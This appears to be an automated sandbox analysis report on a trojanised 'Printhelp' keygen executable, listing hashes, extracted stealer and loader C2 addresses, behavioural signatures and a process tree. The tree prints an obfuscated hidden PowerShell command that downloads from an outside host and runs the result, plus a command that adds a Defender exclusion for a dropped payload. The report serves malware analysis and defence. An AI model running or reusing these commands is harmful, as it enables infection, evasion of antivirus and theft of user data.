Analysis
-
max time kernel
300s -
max time network
303s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:41
Static task
static1
Behavioral task
behavioral1
Sample
Printhelp_3_0_90_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Printhelp_3_0_90_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Printhelp_3_0_90_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Printhelp_3_0_90_keygen_by_KeygenNinja.exe
Resource
win10v20201028
General
-
Target
Printhelp_3_0_90_keygen_by_KeygenNinja.exe
-
Size
5.2MB
-
MD5
ca3728b14865976c4f39d4b1dd058d4b
-
SHA1
41f57c0b052b0ac3a276463f6c09085efb049153
-
SHA256
829a3cefee8046496eb6bc03b2009891bec987a01ebe652bacc42292cf892418
-
SHA512
eabceb4164f54c8332da402ec6f5b91776dedc1b2a4ea1491217a3fed1d4f54bde5863605cbec7910f04f4265a2a9ae8b6dd95aad0ba3dba1ec6a0a26ee217e9
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5736-222-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5736-225-0x00000000025E0000-0x0000000002EEA000-memory.dmp family_glupteba behavioral2/memory/5736-226-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/5216-177-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5216-179-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/5216-190-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5216-211-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 428 keygen-pr.exe 500 keygen-step-1.exe 4064 keygen-step-3.exe 1180 keygen-step-4.exe 1444 key.exe 1816 Setup.exe 2084 key.exe 2580 multitimer.exe 3672 setups.exe 2600 setups.tmp 4648 askinstall20.exe -
Loads dropped DLL 7 IoCs
pid Process 2600 setups.tmp 2600 setups.tmp 2600 setups.tmp 2600 setups.tmp 2600 setups.tmp 2600 setups.tmp 2600 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 259 ipinfo.io 268 ipinfo.io 99 ipinfo.io 102 ipinfo.io 145 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1444 set thread context of 2084 1444 key.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
pid pid_target Process procid_target 5380 5804 WerFault.exe 144 2336 5416 WerFault.exe 148 6976 5416 WerFault.exe 148 3356 5416 WerFault.exe 148 6944 5416 WerFault.exe 148 6596 5416 WerFault.exe 148 4116 5416 WerFault.exe 148 6508 5416 WerFault.exe 148 5072 5416 WerFault.exe 148 5192 5416 WerFault.exe 148 5756 5416 WerFault.exe 148 4024 5416 WerFault.exe 148 7804 6244 WerFault.exe 261 7960 5416 WerFault.exe 148 5848 5416 WerFault.exe 148 -
Delays execution with timeout.exe 3 IoCs
pid Process 152 timeout.exe 4792 timeout.exe 5988 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 5144 taskkill.exe 6212 taskkill.exe 7164 taskkill.exe 3512 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5856 PING.EXE 2848 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 266 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 105 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2600 setups.tmp 2600 setups.tmp -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 1816 Setup.exe Token: SeCreateTokenPrivilege 4648 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4648 askinstall20.exe Token: SeLockMemoryPrivilege 4648 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4648 askinstall20.exe Token: SeMachineAccountPrivilege 4648 askinstall20.exe Token: SeTcbPrivilege 4648 askinstall20.exe Token: SeSecurityPrivilege 4648 askinstall20.exe Token: SeTakeOwnershipPrivilege 4648 askinstall20.exe Token: SeLoadDriverPrivilege 4648 askinstall20.exe Token: SeSystemProfilePrivilege 4648 askinstall20.exe Token: SeSystemtimePrivilege 4648 askinstall20.exe Token: SeProfSingleProcessPrivilege 4648 askinstall20.exe Token: SeIncBasePriorityPrivilege 4648 askinstall20.exe Token: SeCreatePagefilePrivilege 4648 askinstall20.exe Token: SeCreatePermanentPrivilege 4648 askinstall20.exe Token: SeBackupPrivilege 4648 askinstall20.exe Token: SeRestorePrivilege 4648 askinstall20.exe Token: SeShutdownPrivilege 4648 askinstall20.exe Token: SeDebugPrivilege 4648 askinstall20.exe Token: SeAuditPrivilege 4648 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4648 askinstall20.exe Token: SeChangeNotifyPrivilege 4648 askinstall20.exe Token: SeRemoteShutdownPrivilege 4648 askinstall20.exe Token: SeUndockPrivilege 4648 askinstall20.exe Token: SeSyncAgentPrivilege 4648 askinstall20.exe Token: SeEnableDelegationPrivilege 4648 askinstall20.exe Token: SeManageVolumePrivilege 4648 askinstall20.exe Token: SeImpersonatePrivilege 4648 askinstall20.exe Token: SeCreateGlobalPrivilege 4648 askinstall20.exe Token: 31 4648 askinstall20.exe Token: 32 4648 askinstall20.exe Token: 33 4648 askinstall20.exe Token: 34 4648 askinstall20.exe Token: 35 4648 askinstall20.exe Token: SeDebugPrivilege 2580 multitimer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3672 setups.exe 2600 setups.tmp -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 4704 wrote to memory of 3812 4704 Printhelp_3_0_90_keygen_by_KeygenNinja.exe 78 PID 4704 wrote to memory of 3812 4704 Printhelp_3_0_90_keygen_by_KeygenNinja.exe 78 PID 4704 wrote to memory of 3812 4704 Printhelp_3_0_90_keygen_by_KeygenNinja.exe 78 PID 3812 wrote to memory of 428 3812 cmd.exe 81 PID 3812 wrote to memory of 428 3812 cmd.exe 81 PID 3812 wrote to memory of 428 3812 cmd.exe 81 PID 3812 wrote to memory of 500 3812 cmd.exe 82 PID 3812 wrote to memory of 500 3812 cmd.exe 82 PID 3812 wrote to memory of 500 3812 cmd.exe 82 PID 3812 wrote to memory of 4064 3812 cmd.exe 83 PID 3812 wrote to memory of 4064 3812 cmd.exe 83 PID 3812 wrote to memory of 4064 3812 cmd.exe 83 PID 3812 wrote to memory of 1180 3812 cmd.exe 84 PID 3812 wrote to memory of 1180 3812 cmd.exe 84 PID 3812 wrote to memory of 1180 3812 cmd.exe 84 PID 428 wrote to memory of 1444 428 keygen-pr.exe 85 PID 428 wrote to memory of 1444 428 keygen-pr.exe 85 PID 428 wrote to memory of 1444 428 keygen-pr.exe 85 PID 1180 wrote to memory of 1816 1180 keygen-step-4.exe 86 PID 1180 wrote to memory of 1816 1180 keygen-step-4.exe 86 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1444 wrote to memory of 2084 1444 key.exe 87 PID 1816 wrote to memory of 2580 1816 Setup.exe 89 PID 1816 wrote to memory of 2580 1816 Setup.exe 89 PID 1816 wrote to memory of 3672 1816 DrvInst.exe 90 PID 1816 wrote to memory of 3672 1816 DrvInst.exe 90 PID 1816 wrote to memory of 3672 1816 DrvInst.exe 90 PID 3672 wrote to memory of 2600 3672 setups.exe 92 PID 3672 wrote to memory of 2600 3672 setups.exe 92 PID 3672 wrote to memory of 2600 3672 setups.exe 92 PID 1180 wrote to memory of 4648 1180 keygen-step-4.exe 91 PID 1180 wrote to memory of 4648 1180 keygen-step-4.exe 91 PID 1180 wrote to memory of 4648 1180 keygen-step-4.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\Printhelp_3_0_90_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Printhelp_3_0_90_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:500
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\2H6K2L5KKH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2H6K2L5KKH\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\2H6K2L5KKH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2H6K2L5KKH\multitimer.exe" 1 3.1617536591.6069a64f83d06 1016⤵PID:656
-
C:\Users\Admin\AppData\Local\Temp\2H6K2L5KKH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2H6K2L5KKH\multitimer.exe" 2 3.1617536591.6069a64f83d067⤵PID:4408
-
C:\Users\Admin\AppData\Local\Temp\fsfp4mwf4us\qdeswmyt40e.exe"C:\Users\Admin\AppData\Local\Temp\fsfp4mwf4us\qdeswmyt40e.exe" /ustwo INSTALL8⤵PID:968
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "qdeswmyt40e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\fsfp4mwf4us\qdeswmyt40e.exe" & exit9⤵PID:5164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "qdeswmyt40e.exe" /f10⤵
- Kills process with taskkill
PID:5144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2qk4djta1l2\ya4ynsg25h0.exe"C:\Users\Admin\AppData\Local\Temp\2qk4djta1l2\ya4ynsg25h0.exe" /VERYSILENT8⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\is-O0F4L.tmp\ya4ynsg25h0.tmp"C:\Users\Admin\AppData\Local\Temp\is-O0F4L.tmp\ya4ynsg25h0.tmp" /SL5="$601CE,2592217,780800,C:\Users\Admin\AppData\Local\Temp\2qk4djta1l2\ya4ynsg25h0.exe" /VERYSILENT9⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\is-03IHL.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-03IHL.tmp\winlthsth.exe"10⤵PID:5172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:8080
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\y3pikhci3jo\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\y3pikhci3jo\cpyrix.exe" /VERYSILENT8⤵PID:2948
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\587a3251-d31d-4fd7-8ba8-69313ae6a99f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\587a3251-d31d-4fd7-8ba8-69313ae6a99f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\587a3251-d31d-4fd7-8ba8-69313ae6a99f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:2188
-
C:\Users\Admin\AppData\Local\Temp\587a3251-d31d-4fd7-8ba8-69313ae6a99f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\587a3251-d31d-4fd7-8ba8-69313ae6a99f\AdvancedRun.exe" /SpecialRun 4101d8 218811⤵PID:5336
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:4152
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:6044
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:4792
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:2760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 202410⤵
- Program crash
PID:5380
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:6000
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\or3khl4w2lk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\or3khl4w2lk\Setup3310.exe" /Verysilent /subid=5778⤵PID:1328
-
C:\Users\Admin\AppData\Local\Temp\is-87DNI.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-87DNI.tmp\Setup3310.tmp" /SL5="$102B4,138429,56832,C:\Users\Admin\AppData\Local\Temp\or3khl4w2lk\Setup3310.exe" /Verysilent /subid=5779⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\is-RPPCO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RPPCO.tmp\Setup.exe" /Verysilent10⤵PID:5260
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2056
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 94812⤵
- Program crash
PID:2336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 100412⤵
- Program crash
PID:6976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 102012⤵
- Program crash
PID:3356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 111212⤵
- Program crash
PID:6944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 97212⤵
- Program crash
PID:6596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 116412⤵
- Program crash
PID:4116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 120412⤵
- Program crash
PID:6508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 158012⤵
- Program crash
PID:5072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 155212⤵
- Program crash
PID:5192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 173212⤵
- Program crash
PID:5756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 179212⤵
- Program crash
PID:4024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 152412⤵
- Program crash
PID:7960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 85612⤵
- Program crash
PID:5848
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:852
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\is-4JCBR.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4JCBR.tmp\LabPicV3.tmp" /SL5="$202A8,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\is-LBH8C.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-LBH8C.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:3616
-
C:\Program Files\Microsoft Office 15\TQWZXFORHZ\prolab.exe"C:\Program Files\Microsoft Office 15\TQWZXFORHZ\prolab.exe" /VERYSILENT14⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\is-321LN.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-321LN.tmp\prolab.tmp" /SL5="$2041A,575243,216576,C:\Program Files\Microsoft Office 15\TQWZXFORHZ\prolab.exe" /VERYSILENT15⤵PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\03-06959-c2d-b7091-38478a3c3fbe5\Raerovushaeqi.exe"C:\Users\Admin\AppData\Local\Temp\03-06959-c2d-b7091-38478a3c3fbe5\Raerovushaeqi.exe"14⤵PID:1416
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xmddyxz2.4sv\md6_6ydj.exe & exit15⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\xmddyxz2.4sv\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\xmddyxz2.4sv\md6_6ydj.exe16⤵PID:4852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ha5zwk4r.y5s\askinstall31.exe & exit15⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\ha5zwk4r.y5s\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ha5zwk4r.y5s\askinstall31.exe16⤵PID:6464
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6756
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:6212
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pnhvct0q.avm\toolspab1.exe & exit15⤵PID:6640
-
C:\Users\Admin\AppData\Local\Temp\pnhvct0q.avm\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pnhvct0q.avm\toolspab1.exe16⤵PID:4356
-
C:\Users\Admin\AppData\Local\Temp\pnhvct0q.avm\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pnhvct0q.avm\toolspab1.exe17⤵PID:4216
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amg245cc.xph\GcleanerWW.exe /mixone & exit15⤵PID:5488
-
-
-
C:\Users\Admin\AppData\Local\Temp\86-1f678-85a-769b1-b231d29d118b6\Newomoquxae.exe"C:\Users\Admin\AppData\Local\Temp\86-1f678-85a-769b1-b231d29d118b6\Newomoquxae.exe"14⤵PID:4464
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\is-0GGQS.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-0GGQS.tmp\lylal220.tmp" /SL5="$204C6,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\is-7PT56.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-7PT56.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:3468
-
C:\Program Files\Windows Defender\KPCYOJXKNY\irecord.exe"C:\Program Files\Windows Defender\KPCYOJXKNY\irecord.exe" /VERYSILENT14⤵PID:4540
-
